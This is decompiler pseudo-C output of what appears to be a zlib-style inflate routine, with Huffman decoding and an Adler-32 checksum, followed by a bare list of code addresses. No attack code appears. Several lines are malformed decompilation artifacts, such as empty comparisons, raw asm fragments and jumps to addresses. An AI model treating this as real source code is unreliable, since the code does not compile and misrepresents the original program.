				 *(_t1346 + 0x38) = ( *(_t1385 + 0x14) << 8) + 0xfffffff8;
				_t786 =  *(_t1385 + 0x14) << 8;
				_t724 = _t640 & 0x000000ff | _t786;
				 *(_t1385 + 0x14) = _t724;
				 *(_t1346 + 0x40) = _t539 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t824;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t542 = _t724 & 0x000000ff;
				if (_t542 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t881 =  !_t879 & _t786;
				_t1243 = _t1242 >> _t542;
				 *(_t1346 + 0x30) = _t1243;
				 *(_t1346 + 0x38) = _t640;
				 *(_t1346 + 0x40) =  *(_t1346 + 0x40) + _t881;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1346 + 0x30) = _t1243 >> _t542;
				 *(_t1346 + 0x38) = _t640;
				 *(_t1346 + 0x3c) =  *(_t1346 + 0x3c) + ( !_t881 & _t786);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1346 + 0x30) = _t1167 >> _t542;
				 *(_t1346 + 0x38) = _t824;
				 *(_t1346 + 0x80) = _t1094;
				 *(_t1346 + 0x88) = _t1094;
				 *((long long*)(_t1346 + 0x90)) = 0xb;
				_t728 =  *(_t1346 + 0x3c);
				_t1095 = _t1094 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t728 != 0x10) goto 0xf30606d9;
				if (_t1301 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1346 + 0x30) = _t1095 >> 8;
				 *(_t1346 + 0x38) = _t728 + 0xfffffff8;
				 *(_t1346 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t545 =  *(_t1385 + 0x291d) & 0x0000ffff;
				 *(_t1346 + 0x40) = _t545;
				r12b = 0x1e;
				if (_t545 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t545 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1197 =  *((intOrPtr*)(_t1346 + 0x128));
				E000007FE7FEF30F24C0();
				_t1386 =  *((intOrPtr*)(_t1346 + 0x58));
				 *(_t1346 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t1095 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1346 + 0x6c);
				if (_t1197 - 1 > 0) goto 0xf3060acc;
				_t732 =  *(_t1346 + 0x38);
				_t550 =  *((short*)(_t1386 + 0x3c + _t1095 * 2));
				if (_t550 < 0) goto 0xf3060659;
				if ((_t550 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t551 = _t550 >> 9;
				if (_t732 - _t551 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t732 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t551 - 0x23f > 0) goto 0xf3061218;
				_t553 =  *((short*)(_t1386 + 0x83c + _t1095 * 2));
				if (_t553 >= 0) goto 0xf3060690;
				if (_t732 - 0xc >= 0) goto 0xf3060663;
				if (_t553 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1435 = __r15 + 1;
				 *(_t1346 + 0x30) =  *(_t1346 + 0x30) | _t1095 << _t732;
				 *(_t1346 + 0x38) = _t1197 + 8;
				_t1020 = _t732 - 6;
				if (_t1020 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1282 =  *((intOrPtr*)(_t1346 + 0x80 + _t1095 * 8)) + (_t1167 & 0xffffffff);
				if (_t1020 < 0) goto 0xf30613e0;
				if (_t1282 + _t1301 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1282 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1346 + 0x40) =  *(_t1346 + 0x40) + _t824;
				r12b = 0xa;
				_t1387 =  *((intOrPtr*)(_t1346 + 0x58));
				_t1397 =  *((intOrPtr*)(_t1346 + 0x1a0));
				_t1362 =  *(_t1346 + 0x70);
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t848 =  *(_t1346 + 0x38);
				 *(_t1346 + 0x68) =  *(_t1346 + 0x3c);
				r9d =  *(_t1346 + 0x44);
				_t1101 = __r15 - _t1435;
				r12b = 0xc;
				if (_t1101 - 0xe < 0) goto 0xf3060b66;
				if (_t848 - 0x1d > 0) goto 0xf3060794;
				_t1102 = _t1101 << _t848;
				_t1436 = _t1435 + 4;
				_t735 =  *((short*)(_t1387 + 0x3c + _t1102 * 2));
				if (_t735 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t735 - 0x23f > 0) goto 0xf306126f;
				_t1028 =  *((short*)(_t1387 + 0x83c +  &(( *(_t1346 + 0xe8))[_t1301]) * 2));
				if (_t1028 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t1028 < 0) goto 0xf30608a8;
				_t567 =  *((short*)(_t1387 + 0x3c + _t1102 * 2));
				if (_t567 < 0) goto 0xf3060820;
				if ((_t567 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t567 - 0x23f > 0) goto 0xf306127b;
				_t569 =  *((short*)(_t1387 + 0x83c + _t1102 * 2));
				if (_t569 < 0) goto 0xf3060825;
				_t570 = _t569 & 0x0000ffff;
				_t1033 = _t1362 -  *((intOrPtr*)(_t1346 + 0x1a8));
				if (_t1033 >= 0) goto 0xf3061284;
				_t851 = _t848 + 0x20;
				 *(_t1397 + _t1362) = bpl;
				_t1199 = _t1362 + 1;
				asm("bt eax, 0x8");
				if (_t1033 < 0) goto 0xf30608a3;
				_t1252 =  *((intOrPtr*)(_t1346 + 0x1a8));
				if (_t1199 - _t1252 >= 0) goto 0xf30612a2;
				 *(_t1397 + _t1362 + 1) = _t570;
				if (_t1252 - _t1362 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1364 = _t1199;
				_t572 = _t570 & 0x000001ff;
				if (_t572 == 0x100) goto 0xf3060b5e;
				if (_t572 - 0x11d > 0) goto 0xf3061298;
				if (_t851 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1436 - 3 <= 0) goto 0xf306140a;
				_t1437 = _t1436 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t580 =  *((short*)(_t1387 + 0xdda));
				if (_t580 < 0) goto 0xf3060955;
				if ((_t580 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t580 - 0x23f > 0) goto 0xf306127b;
				_t582 =  *((short*)(_t1387 + 0x15da));
				if (_t582 < 0) goto 0xf306095a;
				_t854 = _t851 + 0x20 - r9d - 0xb;
				if ((_t582 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1346 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1346 + 0x118)) = _t1377;
				if (r9d == 0) goto 0xf3060a01;
				if (_t854 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1437 - 3 <= 0) goto 0xf306140a;
				_t1291 = ((( *(_t1346 + 0x30) | _t1102) >> 0x0000000a >> 0xb | __r15 - _t1436 << _t851) >> r9d >> 0xb | 0xffffffff << r9d << _t854) >> r9d;
				_t856 = _t854 + 0x20 - r9d;
				 *(_t1346 + 0x68) = ( !( *_t1437) & _t824) +  *(_t1346 + 0x68);
				r9d =  *(_t1346 + 0x68);
				if (_t1364 - _t1377 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1346 + 0xf4)) != 0) goto 0xf30612b6;
				 *(_t1346 + 0x70) = _t1408;
				 *((long long*)(_t1346 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1346 + 0x28)) =  *(_t1346 + 0xb8);
				 *((long long*)(_t1346 + 0x20)) = 0xf311ef68;
				_t1202 = _t1397;
				_t1257 =  *((intOrPtr*)(_t1346 + 0x1a8));
				E000007FE7FEF306148C(_t1202, _t1257, _t1364, _t1377);
				if ( *((intOrPtr*)(_t1346 + 0x1a8)) - _t1364 +  *((intOrPtr*)(_t1346 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1346 + 0x40) = _t856;
				goto 0xf305f43b;
				_t1118 =  *(_t1346 + 0xb8);
				 *((long long*)(_t1346 + 0x28)) = _t1118;
				 *((long long*)(_t1346 + 0x20)) = _t1202;
				_t1203 =  *((intOrPtr*)(_t1346 + 0x1a0));
				_t591 = E000007FE7FEF306148C(_t1203, _t1257, _t1202,  *((intOrPtr*)(_t1346 + 0x118)));
				_t1389 =  *((intOrPtr*)(_t1346 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t754 = _t591;
				_t1259 = _t1257 << _t754 |  *(_t1346 + 0x30);
				 *(_t1346 + 0x30) = _t1259;
				 *(_t1346 + 0x38) = _t591 + 0x10;
				goto 0xf3060aee;
				_t825 =  *((short*)(_t1389 + 0x3c + _t1203 * 2));
				if (_t825 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t825 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t828 =  *((short*)(_t1389 + 0x83c + _t1291 * 2));
				if (_t828 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1346 + 0x30) = _t1259 >> 0xb;
				 *(_t1346 + 0x38) = _t754 - 0xb;
				 *(_t1346 + 0x40) = _t828 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1346 + 0x30) = _t1291;
				 *(_t1346 + 0x38) = _t856;
				 *(_t1346 + 0x3c) =  *(_t1346 + 0x68);
				 *(_t1346 + 0x40) = 0x100;
				 *(_t1346 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1203 + 8)) = 0xfd;
				 *_t1203 = _t1118;
				 *((long long*)(_t1203 + 0x10)) = _t1118;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1390 =  *((intOrPtr*)(_t1346 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t597 = r9b & 0xffffffff;
				if (_t597 == 0xfc) goto 0xf3060cbe;
				_t761 =  *(_t1346 + 0x38);
				_t832 =  >=  ? _t597 - r15d + r14d : _t761 >> 3;
				_t600 = _t1291 * 8;
				 *(_t1346 + 0x38) = _t761 - _t600;
				_t1304 =  &(_t1437[1]);
				_t1344 =  *((intOrPtr*)(_t1346 + 0x1b0));
				goto 0xf3060cc0;
				_t1204 =  *((intOrPtr*)(_t1346 + 0x1a8));
				if ( *(_t1346 + 0x70) != _t1204) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t600 & 0xffffff00 | r12b == 0x00000017);
				_t1371 = _t1204;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1390 + 0x291c) = r12b;
				_t763 =  *(_t1346 + 0x38);
				 *(_t1390 + 8) = _t763;
				 *(_t1390 + 0x24) =  *(_t1346 + 0x3c);
				 *(_t1390 + 0x28) =  *(_t1346 + 0x40);
				 *(_t1390 + 0x2c) =  *(_t1346 + 0x44);
				 *_t1390 =  !(0xffffffff << _t763) &  *(_t1346 + 0x30);
				_t1061 =  *(_t1346 + 0x1b8) & 0x00000040;
				if (_t1061 != 0) goto 0xf3061169;
				if (_t1061 == 0) goto 0xf3061169;
				_t1062 = r9b;
				if (_t1062 < 0) goto 0xf3061169;
				_t1171 = _t1371 - _t1344;
				if (_t1062 < 0) goto 0xf306137a;
				 *(_t1346 + 0xb8) = _t1291;
				 *(_t1346 + 0x6c) = r9d;
				if (_t1371 -  *((intOrPtr*)(_t1346 + 0x1a8)) > 0) goto 0xf3061389;
				_t604 =  *(_t1390 + 0x20);
				_t1400 =  *((intOrPtr*)(_t1346 + 0x1a0)) + _t1344;
				_t835 = _t604 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1206 = _t1171 & 0xfffffffc;
				 *(_t1346 + 0xf8) = _t1171;
				 *(_t1346 + 0x108) = _t1171;
				_t1127 = _t1206 - 0x3f51f0dfc0;
				 *(_t1346 + 0x50) = _t1127;
				r12d = 0x56c0;
				 *(_t1346 + 0xe8) = _t1400;
				 *(_t1346 + 0xd8) = _t1304;
				 *(_t1346 + 0x7c) = _t835;
				 *(_t1346 + 0x100) = _t1206;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t835 * 0x56c0;
				_t1411 = _t1400;
				 *(_t1346 + 0x80) =  *_t1411 & 0x000000ff;
				 *(_t1346 + 0x84) = _t1411[1] & 0x000000ff;
				 *(_t1346 + 0x88) = _t1411[2] & 0x000000ff;
				 *(_t1346 + 0x8c) = _t1411[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1346 + 0xc0 + _t1390 * 4)) =  *((intOrPtr*)(_t1346 + 0xc0 + _t1390 * 4)) +  *((intOrPtr*)(_t1346 + 0x80 + _t1390 * 4));
				_t392 = _t1390 + 1; // 0x1
				if (_t392 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1346 + 0xa0 + _t1304 * 4)) =  *((intOrPtr*)(_t1346 + 0xa0 + _t1304 * 4)) +  *((intOrPtr*)(_t1346 + 0x80 + _t1304 * 4));
				_t402 = _t1304 + 1; // 0x1
				_t1066 = _t402 - 4;
				if (_t1066 != 0) goto 0xf3060e4c;
				_t1128 = _t1127 + 0xfffffffc;
				if (_t1066 != 0) goto 0xf3060dea;
				_t649 =  *(_t1346 + 0xc0 + _t1128 * 4);
				 *(_t1346 + 0xc0 + _t1128 * 4) = _t649;
				_t409 = _t1128 + 1; // 0x1
				_t1172 = _t409;
				_t1129 = _t1172;
				if (_t1172 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1346 + 0xa0 + _t1129 * 4)) =  *((intOrPtr*)(_t1346 + 0xa0 + _t1129 * 4)) - _t649 * 0xfff1;
				_t416 = _t1129 + 1; // 0x1
				if (_t416 != 4) goto 0xf3060ea7;
				_t1133 = _t1344 * _t1206 >> 0x2f;
				_t1069 = 0x3f51f08900 - __r12;
				if (_t1069 >= 0) goto 0xf3060de2;
				_t1443 =  *(_t1346 + 0x108);
				r14d = r14d & 0x00000003;
				_t1374 =  *((intOrPtr*)(_t1346 + 0x58));
				r10d =  *(_t1346 + 0x1b8);
				_t1309 =  *(_t1346 + 0xe8);
				r12d =  *(_t1346 + 0x7c);
				if (_t1069 == 0) goto 0xf3060fc8;
				_t1380 = 0x3f51f0dfc0 + _t1309;
				 *(_t1346 + 0x80) =  *_t1380 & 0x000000ff;
				 *(_t1346 + 0x84) = _t1380[1] & 0x000000ff;
				 *(_t1346 + 0x88) = _t1380[2] & 0x000000ff;
				 *(_t1346 + 0x8c) = _t1380[3] & 0x000000ff;
				 *((intOrPtr*)(_t1346 + 0xc0 + _t1133 * 4)) =  *((intOrPtr*)(_t1346 + 0xc0 + _t1133 * 4)) +  *((intOrPtr*)(_t1346 + 0x80 + _t1133 * 4));
				_t440 = _t1133 + 1; // 0x1
				_t1266 = _t440;
				_t1134 = _t1266;
				if (_t1266 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t799 =  *(_t1346 + 0x80 + _t1134 * 4);
				 *((intOrPtr*)(_t1346 + 0xa0 + _t1134 * 4)) =  *((intOrPtr*)(_t1346 + 0xa0 + _t1134 * 4)) + _t799;
				_t450 = _t1134 + 1; // 0x1
				_t1267 = _t450;
				_t1135 = _t1267;
				_t1071 = _t1267 - 4;
				if (_t1071 != 0) goto 0xf3060f9f;
				if (_t1071 != 0) goto 0xf3060f41;
				_t800 = _t799 * 0xfff1;
				 *((intOrPtr*)(_t1346 + 0xc0 + _t1135 * 4)) =  *((intOrPtr*)(_t1346 + 0xc0 + _t1135 * 4)) - _t800;
				_t458 = _t1135 + 1; // 0x1
				_t1271 = _t458;
				_t1136 = _t1271;
				if (_t1271 != 4) goto 0xf3060fd7;
				r9d =  *(_t1346 + 0x6c);
				 *((intOrPtr*)(_t1346 + 0xa0 + _t1136 * 4)) =  *((intOrPtr*)(_t1346 + 0xa0 + _t1136 * 4)) - _t800 * 0xfff1;
				_t467 = _t1136 + 1; // 0x1
				_t1275 = _t467;
				_t1137 = _t1275;
				if (_t1275 != 4) goto 0xf3061019;
				 *(_t1346 + 0xa0 + _t1137 * 4) =  *(_t1346 + 0xa0 + _t1137 * 4) << 2;
				_t1138 = _t1137 + 1;
				if (_t1138 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1346 + 0xa4)) =  *((intOrPtr*)(_t1346 + 0xa4)) -  *((intOrPtr*)(_t1346 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1346 + 0xa8)) =  ~( *((intOrPtr*)(_t1346 + 0xc8)) +  *((intOrPtr*)(_t1346 + 0xc8))) +  *((intOrPtr*)(_t1346 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1346 + 0xac)) =  *((intOrPtr*)(_t1346 + 0xac)) + _t1275 + _t1275 * 2;
				_t1139 = _t1138 + 1;
				if (_t1139 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1346 + 0x50);
				_t1141 = _t1139 * _t1344 >> 0x2f;
				_t1142 = _t1141 + 1;
				if (_t1142 != 4) goto 0xf30610e4;
				if (_t1443 == 0) goto 0xf306110b;
				_t773 = r12d +  *((intOrPtr*)(_t1346 + 0xc0 + _t1138 * 4)) + ( *(_t1309 +  *(_t1346 + 0x100) + _t1142) & 0x000000ff);
				_t905 = (_t604 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1346 + 0xa0 + _t1141 * 4)) + _t773;
				if (_t1443 != _t1142 + 1) goto 0xf30610fb;
				_t633 = _t905 * 0xfff1;
				_t908 = _t905 - _t633 << 0x00000010 | _t773 - _t773 * 0x0000fff1;
				 *(_t1374 + 0x20) = _t908;
				_t1079 = r9b;
				if (_t1079 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t1079 == 0) goto 0xf306117f;
				r9b = _t908 ==  *((intOrPtr*)(_t1374 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t1149 =  *((intOrPtr*)(_t1346 + 0x110));
				 *(_t1149 + 8) = r9b;
				 *_t1149 =  *((intOrPtr*)(_t1346 + 0xe0)) -  *(_t1346 + 0xb8) + __r15 +  *(_t1346 + 0xd8);
				 *((long long*)(_t1149 + 0x10)) = _t1374 - _t1344;
				return _t633;
			}

0x7fef305fa3f
0x7fef305fa51
0x7fef305fa55
0x7fef305fa5b
0x7fef305fa68
0x7fef305fa73
0x7fef305fa7c
0x7fef305fa84
0x7fef305fa88
0x7fef305fa90
0x7fef305fa98
0x7fef305fa9c
0x7fef305faa3
0x7fef305faa9
0x7fef305faaf
0x7fef305fabc
0x7fef305fac1
0x7fef305fac7
0x7fef305facd
0x7fef305fad0
0x7fef305fad8
0x7fef305fadc
0x7fef305fadf
0x7fef305fae2
0x7fef305fae7
0x7fef305faee
0x7fef305faf0
0x7fef305faf5
0x7fef305faf7
0x7fef305faff
0x7fef305fb07
0x7fef305fb10
0x7fef305fb18
0x7fef305fb1e
0x7fef305fb28
0x7fef305fb2c
0x7fef305fb2f
0x7fef305fb34
0x7fef305fb3a
0x7fef305fb47
0x7fef305fb52
0x7fef305fb5a
0x7fef305fb60
0x7fef305fb63
0x7fef305fb6b
0x7fef305fb79
0x7fef305fb7c
0x7fef305fb82
0x7fef305fb93
0x7fef305fb9e
0x7fef305fba2
0x7fef305fba5
0x7fef305fbae
0x7fef305fbb1
0x7fef305fbba
0x7fef305fbcc
0x7fef305fbe3
0x7fef305fbe7
0x7fef305fbe9
0x7fef305fbed
0x7fef305fbf0
0x7fef305fbf3
0x7fef305fbfd
0x7fef305fc02
0x7fef305fc0b
0x7fef305fc10
0x7fef305fc14
0x7fef305fc24
0x7fef305fc2c
0x7fef305fc37
0x7fef305fc3a
0x7fef305fc42
0x7fef305fc50
0x7fef305fc55
0x7fef305fc57
0x7fef305fc61
0x7fef305fc64
0x7fef305fc6c
0x7fef305fc70
0x7fef305fc73
0x7fef305fc79
0x7fef305fc7e
0x7fef305fc85
0x7fef305fc87
0x7fef305fc9b
0x7fef305fca0
0x7fef305fcb6
0x7fef305fcbb
0x7fef305fcbe
0x7fef305fcc3
0x7fef305fccb
0x7fef305fcd5
0x7fef305fcdc
0x7fef305fcf3
0x7fef305fcf5
0x7fef305fcfe
0x7fef305fd04
0x7fef305fd09
0x7fef305fd15
0x7fef305fd18
0x7fef305fd1d
0x7fef305fd20
0x7fef305fd24
0x7fef305fd27
0x7fef305fd2a
0x7fef305fd2f
0x7fef305fd36
0x7fef305fd38
0x7fef305fd3a
0x7fef305fd4a
0x7fef305fd4d
0x7fef305fd56
0x7fef305fd59
0x7fef305fd61
0x7fef305fd66
0x7fef305fd69
0x7fef305fd72
0x7fef305fd7a
0x7fef305fd81
0x7fef305fd95
0x7fef305fd9f
0x7fef305fda3
0x7fef305fda9
0x7fef305fdb3
0x7fef305fdb6
0x7fef305fdca
0x7fef305fdce
0x7fef305fdd9
0x7fef305fde2
0x7fef305fde7
0x7fef305fdf0
0x7fef305fdf8
0x7fef305fdfe
0x7fef305fe01
0x7fef305fe0c
0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
